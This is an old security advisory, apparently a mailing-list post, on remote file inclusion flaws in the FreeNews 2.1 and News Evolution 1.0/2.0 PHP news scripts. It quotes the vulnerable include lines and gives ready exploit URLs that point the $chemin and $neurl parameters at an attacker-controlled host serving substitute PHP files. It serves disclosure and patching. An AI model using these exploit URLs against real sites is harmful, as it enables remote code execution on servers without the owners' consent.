FreeNews & News Evolution (PHP)

["Frog Man" <leseulfrog@hotmail.com>]

Informations :
°°°°°°°°°°°°°°
Problem : Include files
a) -------------------
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
----------------------

b) -------------------
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
----------------------


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
a) freenews 2.1
aff_news.php :
-------------------------------------------------
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-------------------------------------------------

...

b) News Evolution 1.0
aff_news.php :
-------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-------------------------------------

moteur/moteur.php :
--------------------------------------------------
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--------------------------------------------------

export_news.php :
---------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---------------------------------------

...

c) News Evolution 2.0
backend.php :
---------------------------------------------------------
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
---------------------------------------------------------

screen.php :
---------------------------------------------------------
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
---------------------------------------------------------

admin/modules/comment.php :
---------------------------------------------------------
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
---------------------------------------------------------

...


Exploits :
°°°°°°°°°°
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...

b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...

c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php


...

Patch :
°°°°°°°
http://www.phpsecure.org

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/NEfree.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n


_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp